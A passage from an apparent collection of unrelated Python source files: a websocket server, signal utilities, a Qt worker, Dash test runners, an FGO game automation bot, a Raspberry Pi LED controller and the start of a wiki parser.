self.application.send_status_update()
if self.worker:
try:
self.worker.set_client_socket(None)
logging.info("%s: Closing worker connection" % self.id)
self.worker.close()
except:
pass
def on_message(self, message):
assert self.worker is not None
logging.info("%s: Forwarding client message (%s) of length %d to worker" % (self.id, type(message), len(message)))
if isinstance(message, unicode):
self.worker.write_message(message, binary=False)
else:
self.worker.write_message(message, binary=True)
def main():
logging.basicConfig(level=logging.DEBUG, format="%(levelname)8s %(asctime)s %(message)s ")
logging.debug('Starting up server')
from tornado.options import options
tornado.options.parse_command_line()
app = Application()
if os.environ.get('WSS'):
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain('/etc/letsencrypt/live/host/cert1.pem', '/etc/letsencrypt/live/host/privkey1.pem')
logging.info('wss')
app.listen(options.port, ssl_options={"certfile": '/etc/letsencrypt/live/host/cert1.pem', "keyfile": '/etc/letsencrypt/live/host/privkey1.pem'})
else:
logging.info('ws')
app.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
_utils.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import contextlib
import errno
import logging
import multiprocessing
import os
import select
import signal
import sys
import threading
import time
if os.name == 'posix':
import fcntl
LOG = logging.getLogger(__name__)
_SIGNAL_TO_NAME = dict((getattr(signal, name), name) for name in dir(signal)
if name.startswith("SIG") and name not in ('SIG_DFL',
'SIG_IGN'))
def signal_to_name(sig):
return _SIGNAL_TO_NAME.get(sig, sig)
def spawn(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def check_workers(workers, minimum):
if not isinstance(workers, int) or workers < minimum:
raise ValueError("'workers' must be an int >= %d, not: %s (%s)" %
(minimum, workers, type(workers).__name__))
def check_callable(thing, name):
if not hasattr(thing, "__call__"):
raise ValueError("'%s' must be a callable" % name)
def _bootstrap_process(target, *args, **kwargs):
if "fds_to_close" in kwargs:
for fd in kwargs["fds_to_close"]:
os.close(fd)
del kwargs["fds_to_close"]
target(*args, **kwargs)
def spawn_process(*args, **kwargs):
p = multiprocessing.Process(target=_bootstrap_process,
args=args, kwargs=kwargs)
p.start()
return p
try:
from setproctitle import setproctitle
except ImportError:
def setproctitle(*args, **kwargs):
pass
def get_process_name():
return os.path.basename(sys.argv[0])
def run_hooks(name, hooks, *args, **kwargs):
try:
for hook in hooks:
hook(*args, **kwargs)
except Exception:
LOG.exception("Exception raised during %s hooks" % name)
@contextlib.contextmanager
def exit_on_exception():
try:
yield
except SystemExit as exc:
os._exit(exc.code)
except BaseException:
LOG.exception('Unhandled exception')
os._exit(2)
if os.name == "posix":
SIGALRM = signal.SIGALRM
SIGHUP = signal.SIGHUP
SIGCHLD = signal.SIGCHLD
SIBREAK = None
else:
SIGALRM = SIGHUP = None
SIGCHLD = "fake sigchld"
SIGBREAK = signal.SIGBREAK
class SignalManager(object):
def __init__(self):
# Setup signal fd, this allows signal to behave correctly
if os.name == 'posix':
self.signal_pipe_r, self.signal_pipe_w = os.pipe()
self._set_nonblock(self.signal_pipe_r)
self._set_nonblock(self.signal_pipe_w)
signal.set_wakeup_fd(self.signal_pipe_w)
self._signals_received = collections.deque()
signal.signal(signal.SIGINT, signal.SIG_DFL)
if os.name == 'posix':
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
signal.signal(signal.SIGTERM, self._signal_catcher)
signal.signal(signal.SIGALRM, self._signal_catcher)
signal.signal(signal.SIGHUP, self._signal_catcher)
else:
# currently a noop on window...
signal.signal(signal.SIGTERM, self._signal_catcher)
# FIXME(sileht): should allow to catch signal CTRL_BREAK_EVENT,
# but we to create the child process with CREATE_NEW_PROCESS_GROUP
# to make this work, so current this is a noop for later fix
signal.signal(signal.SIGBREAK, self._signal_catcher)
@staticmethod
def _set_nonblock(fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def _signal_catcher(self, sig, frame):
# NOTE(sileht): This is useful only for python < 3.5
# in python >= 3.5 we could read the signal number
# from the wakeup_fd pipe
if sig in (SIGALRM, signal.SIGTERM):
self._signals_received.appendleft(sig)
else:
self._signals_received.append(sig)
def _wait_forever(self):
# Wait forever
while True:
# Check if signals have been received
if os.name == "posix":
self._empty_signal_pipe()
self._run_signal_handlers()
if os.name == "posix":
# NOTE(sileht): we cannot use threading.Event().wait(),
# threading.Thread().join(), or time.sleep() because signals
# can be missed when received by non-main threads
# (https://bugs.python.org/issue5315)
# So we use select.select() alone, we will receive EINTR or
# will read data from signal_r when signal is emitted and
# cpython calls PyErr_CheckSignals() to run signals handlers
# That looks perfect to ensure handlers are run and run in the
# main thread
try:
select.select([self.signal_pipe_r], [], [])
except select.error as e:
if e.args[0] != errno.EINTR:
raise
else:
# NOTE(sileht): here we do only best effort
# and wake the loop periodically, set_wakeup_fd
# doesn't work on non posix platform so
# 1 seconds have been picked with the advice of a dice.
time.sleep(1)
# NOTE(sileht): We emulate SIGCHLD, _service_manager
# will just check often for dead child
self._signals_received.append(SIGCHLD)
def _empty_signal_pipe(self):
try:
while os.read(self.signal_pipe_r, 4096) == 4096:
pass
except (IOError, OSError):
pass
def _run_signal_handlers(self):
while True:
try:
sig = self._signals_received.popleft()
except IndexError:
return
self._on_signal_received(sig)
def _on_signal_received(self, sig):
pass
|
Params.py
|
import sys
import threading
import time
from polyaxon_client.tracking import Experiment
from params import param_utils
import params.polyaxon_parsing as pp
from util.output_artifact_utils import define_prepare_mdl_path, \
define_prepare_tb_path
def get_file_inputs():
while True:
try:
sys.argv.append(input())
except EOFError:
break
class Params:
"""
Description
----
This enables the code to use the polyaxon
"""
# This is to load the params from a file
input_thread = threading.Thread(target=get_file_inputs, args=(), daemon=True)
input_thread.start()
print("Fetching inputs", end=" ... -> ")
time.sleep(10)
print("done.")
temporal_context = 0
last_interval = None
# polyaxon params
experiment = Experiment()
plx = pp.get_parameters()
param_utils.set_params(plx)
param_utils.check_params(plx)
# output paths
file_path_mdl = define_prepare_mdl_path(plx)
logdir_tb = define_prepare_tb_path()
|
qt_worker.py
|
from pyqtgraph.Qt import QtCore, QtGui
import traceback
import sys
from multiprocessing import Process, Pool, Queue, Pipe
import time
class WorkerSignals(QtCore.QObject):
'''
Defines the signals available from a running worker thread.
Supported signals are:
finished
No data
error
`tuple` (exctype, value, traceback.format_exc() )
result
`object` data returned from processing, anything
progress
`int` indicating % progress
'''
finished = QtCore.pyqtSignal()
error = QtCore.pyqtSignal(tuple)
result = QtCore.pyqtSignal(object)
progress = QtCore.pyqtSignal(int)
class Worker(QtCore.QRunnable):
'''
Worker thread
Inherits from QRunnable to handler worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function
'''
def __init__(self, fn, *args, progress_fn=None, useMultiProcessing=False, verbose=False, **kwargs):
super().__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.useMultiProcessing = useMultiProcessing
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
self.verbose = verbose
self.progress_fn = progress_fn
process_pipe, main_pipe = Pipe()
self.receiver = main_pipe
self.sender = process_pipe
# Add the callback to our kwargs
# self.kwargs['progress_callback'] = self.signals.progress
def progress_update(self, queue, progress):
# queue.put(progress)
# get_progress(queue)
# self.signals.progress.emit(progress)
if self.progress_fn is not None:
self.progress_fn(progress)
@QtCore.pyqtSlot()
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
time_begin = time.time()
if self.verbose:
print('Starting process...')
# Retrieve args/kwargs here; and fire processing using them
try:
queue = Queue()
if self.useMultiProcessing is False:
# Only use threading, without using multiprocessing.Process
result = self.fn(*self.args, queue, self.sender, **self.kwargs)
# result = queue.get()
else:
# Process using multiprocessing.Pool
# This interface is consistent with threading, but progress cannot be communicated.
# Hence below approach using multiprocessing.Process and Queue is used.
# p = Pool(processes=1)
# results = p.map(self.fn, [*self.args])
# result = results[0]
# p.close()
# The function input has 2 additional arguements (Queue and callback function).
# This interface is not straightforward and needs to be fixed later.
p = Process(target=self.fn, args=[*self.args, queue, self.sender], kwargs=self.kwargs, daemon=True)
p.start()
while queue.empty():
try:
# progress = self.receiver.poll(timeout=None)
progress = None
while self.receiver.poll():
progress = self.receiver.recv()
except EOFError:
break
else:
self.signals.progress.emit(progress)
result = queue.get()
p.join()
except:
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
if self.verbose:
print('Process finished!! Time elapsed = ' + ('%.3f' %(time.time()-time_begin)) + ' sec')
finally:
self.signals.finished.emit() # Done
# Alternative implementation. Unfinished.
# class SimpleThread(QtCore.QThread):
# finished = QtCore.pyqtSignal(object)
# def __init__(self, queue, callback, parent=None):
# QtCore.QThread.__init__(self, parent)
# self.queue = queue
# self.finished.connect(callback)
# def run(self):
# while True:
# arg = self.queue.get()
# if arg is None: # None means exit
# print("Shutting down")
# return
# self.fun(arg)
# def fun(self, sim):
# print('Running ' + str(sim.sim_time))
# log = sim.run()
# print('Finished ' + str(sim.sim_time))
# self.finished.emit(log)
|
application_runners.py
|
from __future__ import print_function
import sys
import os
import uuid
import shlex
import threading
import shutil
import subprocess
import logging
import inspect
import runpy
import future.utils as utils
import flask
import requests
from dash.testing.errors import (
NoAppFoundError,
TestingTimeoutError,
ServerCloseError,
)
import dash.testing.wait as wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""Import a dash application from a module. The import path is in dot
notation to the module. The variable named app will be returned.
:Example:
>>> app = import_app("my_app.app")
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
)
return app
class BaseDashRunner(object):
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
self._tmp_app_path = None
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(
self.stop_timeout
)
)
@property
def url(self):
"""The default server url."""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
@property
def tmp_app_path(self):
return self._tmp_app_path
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread.
This is the default flavor to use in dash integration tests.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ThreadedRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ,C0330
def start(self, app, **kwargs):
"""Start the app server in threading flavor."""
app.server.add_url_rule(
self.stop_route, self.stop_route, self._stop_server
)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
try:
self.thread.start()
except RuntimeError: # multiple call on same thread
logger.exception("threaded server failed to start")
self.started = False
self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess.
This flavor is closer to production environment but slower.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ProcessRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(
self,
app_module=None,
application_name="app",
raw_command=None,
port=8050,
start_timeout=3,
):
"""Start the server with waitress-serve in process flavor."""
if not (app_module or raw_command): # need to set a least one
logging.error(
"the process runner needs to start with"
" at least one valid command"
)
return
self.port = port
args = shlex.split(
raw_command
if raw_command
else "waitress-serve --listen=0.0.0.0:{} {}:{}.server".format(
port, app_module, application_name
),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(
lambda: self.accessible(self.url), timeout=start_timeout
)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
self.stop()
return
self.started = True
def stop(self):
if self.proc:
try:
self.proc.terminate()
if utils.PY3:
# pylint:disable=no-member
_except = subprocess.TimeoutExpired
# pylint: disable=unexpected-keyword-arg
self.proc.communicate(timeout=self.stop_timeout)
else:
_except = OSError
self.proc.communicate()
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super(RRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=2, cwd=None):
"""Start the server with subprocess and Rscript."""
# app is a R string chunk
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("RRunner inferred cwd from app path: %s", cwd)
else:
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"),
uuid.uuid4().hex,
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception(
"cannot make temporary folder %s", self.tmp_app_path
)
path = os.path.join(self.tmp_app_path, "app.R")
logger.info("RRunner start => app is R code chunk")
logger.info("make a temporary R file for execution => %s", path)
logger.debug("content of the dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info(
"RRunner inferred cwd from the Python call stack: %s", cwd
)
else:
logger.warning(
"RRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashr.run_server(app, cwd=os.path.dirname(__file__))"
)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
# note that the R assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__")
and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(
self.tmp_app_path, os.path.basename(asset)
)
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript -e 'source(\"{}\")'".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(
lambda: self.accessible(self.url), timeout=start_timeout
)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
fgoFunc.py
|
# Stars Cosmos Gods Animus Antrum Unbirth Anima Animusphere
# 星の形.宙の形.神の形.我の形.天体は空洞なり.空洞は虚空なり.虚空には神ありき.
# 地を照らし,空に在り,天上の座標を示せ.
# カルディアの灯よ.
# どうか今一度,旅人の標とならん事を.
# ここで,Bgo運営の敗北を宣言する!
# . OO---O---O-o\
# . // \ / \ / \ \\
# . OO O O O \\
# . // \ \ / / \ \\
# . oO---O---O---O---O-Oo
# . \\ / / \ \ / //
# . \O O O O //
# . \\ / \ / \ / //
# . oO---O---Oo-O
# . ^^
# . Grand Order/Anima Animusphere
# . 冠位指定/人理保障天球
'Full-automatic FGO Script'
__author__='hgjazhgj'
__version__='v7.9.2'
import logging,re,time,numpy
from threading import Thread
from itertools import permutations
from fgoAndroid import Android
from fgoCheck import Check
from fgoControl import control,ScriptTerminate
from fgoFuse import fuse
from fgoImageListener import ImageListener
from fgoLogging import getLogger,logit
logger=getLogger('Func')
friendImg=ImageListener('fgoImage/friend/')
mailImg=ImageListener('fgoImage/mail/')
class Device(Android):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
Check.device=self
device=Device()
def guardian():
prev=None
while True:
if Check.cache is not prev and Check.cache.isNetworkError():
logger.warning('Reconnecting')
device.press('K')
prev=Check.cache
time.sleep(3)
Thread(target=guardian,daemon=True,name='Guardian').start()
def gacha():
while fuse.value<30:
if Check().isGacha():device.perform('MK',(200,2700))
device.press('\xBB')
def jackpot():
while fuse.value<50:
if Check().isNextJackpot():device.perform('\xDCKJ',(600,2400,500))
for _ in range(40):device.press('2')
def mailFiltering():
if not mailImg.flush():return
Check().setupMailDone()
while True:
while any((pos:=Check.cache.find(i[1],threshold=.016))and(device.touch(pos),True)[-1]for i in mailImg.items()):
while not Check().isMailDone():pass
device.swipe((400,900,400,300))
if Check().isMailListEnd():break
class Battle:
skillInfo=[[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]]]
houguInfo=[[1,7],[1,7],[1,7],[1,7],[1,7],[1,7]]
masterSkill=[[0,0,0,7],[0,0,0,7],[0,0,0,0,7]]
def __init__(self):
Battle.friendInfo=[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]]
self.turn=0
self.stage=0
self.stageTurn=0
self.servant=[0,1,2]
self.orderChange=[0,1,2,3,4,5]
self.masterSkillReady=[True,True,True]
self.specialDrop=False
def __call__(self):
while True:
if Check(0,.3).isTurnBegin():
self.turn+=1
self.stage,self.stageTurn=[t:=Check(.2).getStage(),1+self.stageTurn*(self.stage==t)]
self.friend=Check.cache.isServantFriend()
Check.cache.getHP(),Check.cache.getNP()
if self.turn==1:
Check.cache.setupServantDead(self.friend)
self.stageTotal=Check.cache.getStageTotal()
else:self.servant=(lambda m,p:[m+p.index(i)+1 if i in p else self.servant[i]for i in range(3)])(max(self.servant),(lambda dead:[i for i in range(3)if self.servant[i]<6 and dead[i]])(Check.cache.isServantDead(self.friend)))
logger.info(f'Turn {self.turn} Stage {self.stage} StageTurn {self.stageTurn} {self.servant}')
if self.stageTurn==1:device.perform('\x67\x68\x69'[numpy.argmax(Check.cache.getEnemyHP())]+'\xBB',(800,500))
while(s:=(lambda skill:[(self.getSkillInfo(i,j,3),0,(i,j))for i in range(3)if self.servant[i]<6 for j in range(3)if skill[i][j]and(t:=self.getSkillInfo(i,j,0))and min(t,self.stageTotal)<<8|self.getSkillInfo(i,j,1)<=self.stage<<8|self.stageTurn])(Check.cache.isSkillReady())+[(self.masterSkill[i][-1],1,i)for i in range(3)if self.masterSkillReady[i]and self.stage==min(self.masterSkill[i][0],self.stageTotal)and self.stageTurn==self.masterSkill[i][1]]):
_,cast,arg=min(s,key=lambda x:x[0])
if cast==0:
device.perform(('ASD','FGH','JKL')[arg[0]][arg[1]],(300,))
if t:=self.getSkillInfo(*arg,2):device.perform('234'[t-1],(300,))
elif cast==1:
self.masterSkillReady[arg]=False
device.perform('Q'+'WER'[arg],(300,300))
if self.masterSkill[arg][2]:
if arg==2 and self.masterSkill[2][3]:
if self.masterSkill[2][2]-1 not in self.servant or self.masterSkill[2][3]-1 in self.servant:
device.perform('\xBB',(300,))
continue
p=self.servant.index(self.masterSkill[2][2]-1)
device.perform(('TYUIOP'[p],'TYUIOP'[self.masterSkill[2][3]-max(self.servant)+1],'Z'),(300,300,2600))
self.orderChange[self.masterSkill[2][2]-1],self.orderChange[self.masterSkill[2][3]-1]=self.orderChange[self.masterSkill[2][3]-1],self.orderChange[self.masterSkill[2][2]-1]
control.sleep(2.3)
while not Check().isTurnBegin():pass
self.friend=Check(.5).isServantFriend()
Check.cache.setupServantDead(self.friend)
continue
device.perform('234'[self.masterSkill[arg][2]-1],(300,))
control.sleep(2.3)
while not Check().isTurnBegin():pass
Check(.5)
device.perform(' ',(2100,))
device.perform(self.selectCard(),(270,270,2270,1270,6000))
elif Check.cache.isSpecialDropSuspended():
control.checkSpecialDrop()
logger.warning('Special drop')
Check.cache.save('fgoLogs/SpecialDrop')
device.press('\x67')
elif not self.specialDrop and Check.cache.isSpecialDropRainbowBox():self.specialDrop=True
elif Check.cache.isBattleFinished():
logger.info('Battle Finished')
if self.specialDrop:
control.checkSpecialDrop()
logger.warning('Special drop')
Check.cache.save('fgoLogs/SpecialDrop')
return self.turn
elif Check.cache.isBattleDefeated():
logger.warning('Battle Defeated')
return 0
device.press('\xBB')
@logit(logger,logging.INFO)
def selectCard(self):return''.join((lambda hougu,sealed,color,resist,critical:['678'[i]for i in sorted((i for i in range(3)if hougu[i]),key=lambda x:self.getHouguInfo(x,1))]+['12345'[i]for i in sorted(range(5),key=(lambda x:-color[x]*resist[x]*(not sealed[x])*(1+critical[x])))]if any(hougu)else(lambda group:['12345'[i]for i in(lambda choice:choice+tuple({0,1,2,3,4}-set(choice)))(logger.debug('cardRank'+','.join((' 'if i%5 else'\n')+f'({j}, {k:5.2f})'for i,(j,k)in enumerate(sorted([(card,(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1)))for card in permutations(range(5),3)],key=lambda x:-x[1]))))or max(permutations(range(5),3),key=lambda card:(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1))))])(Check.cache.getCardGroup()))([self.servant[i]<6 and j and(t:=self.getHouguInfo(i,0))and self.stage>=min(t,self.stageTotal)for i,j in enumerate(Check().isHouguReady())],Check.cache.isCardSealed(),Check.cache.getCardColor(),Check.cache.getCardResist(),Check.cache.getCriticalRate()))
def getSkillInfo(self,pos,skill,arg):return self.friendInfo[0][skill][arg]if self.friend[pos]and self.friendInfo[0][skill][arg]>=0 else self.skillInfo[self.orderChange[self.servant[pos]]][skill][arg]
def getHouguInfo(self,pos,arg):return self.friendInfo[1][arg]if self.friend[pos]and self.friendInfo[1][arg]>=0 else self.houguInfo[self.orderChange[self.servant[pos]]][arg]
class Main:
teamIndex=0
def __init__(self,appleTotal=0,appleKind=0,battleClass=Battle):
self.appleTotal=appleTotal
self.appleKind=appleKind
self.battleClass=battleClass
self.appleCount=0
self.battleCount=0
def __call__(self):
while True:
self.battleFunc=self.battleClass()
while True:
if Check(.3,.3).isMainInterface():
device.press('8')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
while not Check().isBattleBegin():pass
if self.teamIndex and Check.cache.getTeamIndex()+1!=self.teamIndex:device.perform('\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79'[self.teamIndex-1]+' ',(1000,400))
device.perform(' M',(800,10000))
break
elif Check.cache.isBattleContinue():
device.press('L')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
control.sleep(6)
break
elif Check.cache.isTurnBegin():break
elif Check.cache.isAddFriend():device.perform('X',(300,))
elif Check.cache.isSpecialDropSuspended():device.perform('\x67',(300,))
device.press('\xBB')
self.battleCount+=1
logger.info(f'Battle {self.battleCount}')
if self.battleFunc():device.press(' ')
else:
control.checkDefeated()
device.perform('BIK',(500,500,500))
control.checkTerminateLater()
@logit(logger,logging.INFO)
def eatApple(self):
if self.appleCount==self.appleTotal:return device.press('Z')
self.appleCount+=1
device.perform('W4K8'[self.appleKind]+'L',(400,1200))
return self.appleCount
@logit(logger,logging.INFO)
def chooseFriend(self):
refresh=False
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
if refresh:control.sleep(10)
device.perform('\xBAK',(500,1000))
refresh=True
if not friendImg.flush():return device.press('8')
while True:
timer=time.time()
while True:
for i in(i for i,j in friendImg.items()if(lambda pos:pos and(device.touch(pos),True)[-1])(Check.cache.find(j))):
Battle.friendInfo=(lambda r:(lambda p:([[-1 if p[i*4+j]=='x'else int(p[i*4+j])for j in range(4)]for i in range(3)]+[-1 if p[i+12]=='x'else int(p[i+12])for i in range(2)]))(r.group())if r else[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]])(re.search('[0-9xX]{14}$',i)if i else None)
return i
if Check.cache.isFriendListEnd():break
device.swipe((800,900,800,300))
Check(.4)
if refresh:control.sleep(max(0,timer+10-time.time()))
device.perform('\xBAK',(500,1000))
refresh=True
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
control.sleep(10)
device.perform('\xBAK',(500,1000))
class UserScript:
def __call__(self):
while not Check(0,.3).isTurnBegin():device.press('\xBB')
# # BX WCBA 极地用迦勒底制服
# # A D F 2 G H 2 J 2 K L 2 Q E 2 _ 6 5 4
# device.perform('ADF2GH2J2KL2QE2 654',(3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,300,350,3000,2400,350,350,10000))
# # Hikari Nobu Kintoki wcba atorasu
# # Q E 2 A F 2 G H 2 J 2 K L 2 _ 6 5 4
# device.perform('QE2AF2GH2J2KL2 654',(300,350,3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,2400,350,350,10000))
device.perform('QE2',(300,350,3000))
return Battle()()
|
led_status.py
|
'''
Led Status
Handle the led status light
Author: Tawn Kramer
'''
import sys
import time
import threading
try:
import RPi.GPIO as GPIO
except:
print 'no RPi.GPIO support'
import gpio_stub as GPIO
import conf
def setup(pin=23):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(pin,GPIO.OUT)
def set_led(pin=23, on_off=True):
'''
takes a pin and a bool whether to turn led on or off
'''
if on_off:
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
def blink(pin=23, n_times=3, delay=1.0):
while n_times > 0:
set_led(pin, True)
time.sleep(delay)
set_led(pin, False)
time.sleep(delay)
n_times -= 1
def test():
pin = int(sys.argv[1])
print "using pin", pin
setup(pin)
blink(pin)
'''
This show_status is a timer that must be kept
positive to keep the status light blinking.
We fire the status light when we get images to record.
'''
show_status = 0.0
def blink_status_thread():
global show_status
setup(conf.status_pin)
while show_status > 0.0:
blink(conf.status_pin, n_times=1, delay=1.0)
show_status -= 2.0
def start_status_thread():
th = threading.Thread(target=blink_status_thread)
th.daemon = True
global show_status
show_status = 3.0
th.start()
def keep_status_alive():
global show_status
if show_status <= 0.0:
start_status_thread()
show_status = 3.0
def shutdown():
global show_status
if show_status > 0.0:
show_status = 0.0
time.sleep(2)
#make sure we leave the led off
set_led(conf.status_pin, False)
if __name__ == "__main__":
test()
|
wiki_parser.py
|
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import json
import os
import re
import multiprocessing as mp
import logging
from typing import List, Tuple, Dict, Any
import sentry_sdk
from hdt import HDTDocument
from common.wiki_skill import used_types as wiki_skill_used_types
sentry_sdk.init(os.getenv("SENTRY_DSN"))
logging.basicConfig(format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.DEBUG)
log = logging.getLogger(__name__)
prefixes = {
"entity": "http://we",
"label": "http://wl",
